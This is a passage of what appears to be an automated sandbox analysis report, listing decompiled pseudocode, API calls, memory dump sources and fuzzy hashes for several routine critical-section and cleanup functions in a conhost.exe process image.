				if (__eflags == 0) goto 0x935e027b;
				_t27 =  *0x93602560; // 0x0
				_t15 = _t27;
				if (_t15 == 0) goto 0x935e0368;
				goto 0x935e023f;
				if (_t15 == 0) goto 0x935e027b;
				if ( *_t27 == 0) goto 0x935e0290;
				if ((__edx >> 0x00000002 >> 0x00000001 & 0x00000001) == 0) goto 0x935e0230;
				_t6 = E00007FF67FF6935E0080(_t12, _t13, __rax, __rcx,  *_t27, _t32);
				if (_t21 == 0) goto 0x935e0360;
				if (__rcx == 0) goto 0x935e0300;
				_t20 =  *((intOrPtr*)(__rcx + 8)) - 9;
				if (_t20 <= 0) goto 0x935e02c0;
				free(??);
				if (_t20 != 0) goto 0x935e0234;
				return _t6;
			}











                        0x7ff6935e01e0
                        0x7ff6935e01f8
                        0x7ff6935e0204
                        0x7ff6935e0206
                        0x7ff6935e020d
                        0x7ff6935e0210
                        0x7ff6935e022a
                        0x7ff6935e0232
                        0x7ff6935e023a
                        0x7ff6935e0242
                        0x7ff6935e024a
                        0x7ff6935e0255
                        0x7ff6935e025e
                        0x7ff6935e0264
                        0x7ff6935e026a
                        0x7ff6935e0272
                        0x7ff6935e0279
                        0x7ff6935e028c

                        APIs
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: CriticalLeaveSectionfree
                        • String ID:
                        • API String ID: 1679108487-0
                        • Opcode ID: adc6cf295aae2cf19ce611f028aa122ed7393dc6cfa836f0b9222f070bf0ebee
                        • Instruction ID: 0f76ba351b1e14b776190c84cce294e41e7e885ea8b0984b3535a20e2f82727e
                        • Opcode Fuzzy Hash: adc6cf295aae2cf19ce611f028aa122ed7393dc6cfa836f0b9222f070bf0ebee
                        • Instruction Fuzzy Hash: A7414C31A0AB13A2FA719B47D95733A2299FF0CB84F5840B5DD1DAB794DE3DA841D340
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF6935D8910 Relevance: 5.1, APIs: 4, Instructions: 84COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E00007FF67FF6935D8910(intOrPtr* __rcx) {
				intOrPtr* _t6;

				if (__rcx == 0) goto 0x935d89b0;
				_t6 =  *((intOrPtr*)(__rcx));
				if (_t6 == 0) goto 0x935d89b0;
				if (_t6 == 0xffffffff) goto 0x935d8a20;
				if ( *_t6 == 0xc0bab1fd) goto 0x935d8950;
				return 0x16;
			}




                        0x7ff6935d891c
                        0x7ff6935d8922
                        0x7ff6935d8928
                        0x7ff6935d8932
                        0x7ff6935d8943
                        0x7ff6935d894e

                        APIs
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: CriticalSection$EnterLeave
                        • String ID:
                        • API String ID: 3168844106-0
                        • Opcode ID: 71e6c7ade14b834ee1dff418865bf3bdb65654dd847269692b357b04037bf443
                        • Instruction ID: e2822ce4d74877ca2ab262b929fd1e055cf319c16c4623f27341a9d3f1c0edea
                        • Opcode Fuzzy Hash: 71e6c7ade14b834ee1dff418865bf3bdb65654dd847269692b357b04037bf443
                        • Instruction Fuzzy Hash: E7316173A146428AE7A5CF35D44276A33A8FB08B6CF584176CD3A9A394DF3CD885C750
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF6935D8C40 Relevance: 5.1, APIs: 4, Instructions: 83COMMON
                        Download Yara Rule
                        C-Code - Quality: 64%
                        			E00007FF67FF6935D8C40(intOrPtr* __rcx, void* __rdx) {
				intOrPtr _t12;
				intOrPtr _t14;
				intOrPtr _t19;
				void* _t27;
				intOrPtr* _t28;

				_t19 =  *__rcx;
				_t28 = __rcx;
				EnterCriticalSection(??);
				_t14 =  *((intOrPtr*)(_t19 + 0xc));
				if (_t14 == 0) goto 0x935d8cc0;
				 *((intOrPtr*)(_t19 + 0xc)) = _t27 - 1;
				LeaveCriticalSection(??);
				if (_t14 != 1) goto 0x935d8c9a;
				if (E00007FF67FF6935D7C40(1,  *((intOrPtr*)(_t19 + 0xa8)), _t19 + 0x70, _t19 + 0x98) != 0) goto 0x935d8ca7;
				_t12 = E00007FF67FF6935CF8A0( *((intOrPtr*)(_t28 + 8)));
				if (_t12 == 0) goto 0x935d8cad;
				 *((intOrPtr*)( *((intOrPtr*)(_t28 + 0x10)))) = _t12;
				return _t12;
			}








                        0x7ff6935d8c4c
                        0x7ff6935d8c53
                        0x7ff6935d8c59
                        0x7ff6935d8c5f
                        0x7ff6935d8c64
                        0x7ff6935d8c6c
                        0x7ff6935d8c6f
                        0x7ff6935d8c78
                        0x7ff6935d8c98
                        0x7ff6935d8c9e
                        0x7ff6935d8ca5
                        0x7ff6935d8cab
                        0x7ff6935d8cb9

                        APIs
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: CriticalSection$Leave$Enter$ReleaseSemaphore
                        • String ID:
                        • API String ID: 3630377130-0
                        • Opcode ID: d8f8cf3c407a1e10744407098590ea028c7fb0511c319897a0dcd75f80ae929a
                        • Instruction ID: 46ac7ac6c8f6d630b423fd7a2af24f0e6e42b9e17d36185f32314564e0bbfa1d
                        • Opcode Fuzzy Hash: d8f8cf3c407a1e10744407098590ea028c7fb0511c319897a0dcd75f80ae929a
                        • Instruction Fuzzy Hash: F3317233A0460296E721DF36D80266933A8FB49F98F5441B2DE2DEB3A4DF38E845C310
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF6935D87D0 Relevance: 5.1, APIs: 4, Instructions: 81COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E00007FF67FF6935D87D0(intOrPtr* __rcx) {
				intOrPtr* _t6;

				if (__rcx == 0) goto 0x935d8868;
				_t6 =  *((intOrPtr*)(__rcx));
				if (_t6 == 0) goto 0x935d8868;
				if (_t6 == 0xffffffff) goto 0x935d88d0;
				if ( *_t6 == 0xc0bab1fd) goto 0x935d8810;
				return 0x16;
			}




                        0x7ff6935d87da
                        0x7ff6935d87e0
                        0x7ff6935d87e6
                        0x7ff6935d87f0
                        0x7ff6935d8801
                        0x7ff6935d880a

                        APIs
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: CriticalSection$EnterLeave
                        • String ID:
                        • API String ID: 3168844106-0
                        • Opcode ID: ab8931bfbd3a9edb0fe1755c853049cb62c13efc9d9ebc00be137446e316cfe1
                        • Instruction ID: 87de8258bce0e6e565774b674a19c41544f6397aefd793a0334bf782ec8b7c54
                        • Opcode Fuzzy Hash: ab8931bfbd3a9edb0fe1755c853049cb62c13efc9d9ebc00be137446e316cfe1
                        • Instruction Fuzzy Hash: 43318672A046428AEB65CF35D40226933A4FB48B68F588676CD3D9A398DF38D885C710
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00007FF6935D84E0 Relevance: 5.1, APIs: 4, Instructions: 52COMMON
                        Download Yara Rule
                        APIs
                        • EnterCriticalSection.KERNEL32(?,?,?,?,00007FF6935D8B09), ref: 00007FF6935D8506
                        • LeaveCriticalSection.KERNEL32(?,00007FF6935D8B09,?,?,?,?,?,?,?,?,?,?,?,00007FF6936023E0,?), ref: 00007FF6935D852B
                        • EnterCriticalSection.KERNEL32(?,00007FF6935D8B09,?,?,?,?,?,?,?,?,?,?,?,00007FF6936023E0,?), ref: 00007FF6935D855C
                        • LeaveCriticalSection.KERNEL32(?,00007FF6935D8B09,?,?,?,?,?,?,?,?,?,?,?,00007FF6936023E0,?), ref: 00007FF6935D8566
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmpDownload File
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: CriticalSection$EnterLeave
                        • String ID:
                        • API String ID: 3168844106-0
                        • Opcode ID: 6f5503f9c9e4779475b3fc87d2a037910102e3e55d9bf62ca4ef729959e27a63
                        • Instruction ID: cccdaa7d7fccbe9d0eb3b558860d7ddba731a4bafd7d645dca0398391f69f33d
                        • Opcode Fuzzy Hash: 6f5503f9c9e4779475b3fc87d2a037910102e3e55d9bf62ca4ef729959e27a63
                        • Instruction Fuzzy Hash: 7401F222B08A45A9EA26DB33BC42A2B2758FF88FE9F855072DD1D57310CD3CE8469300
                        Uniqueness

                        Uniqueness Score: -1.00%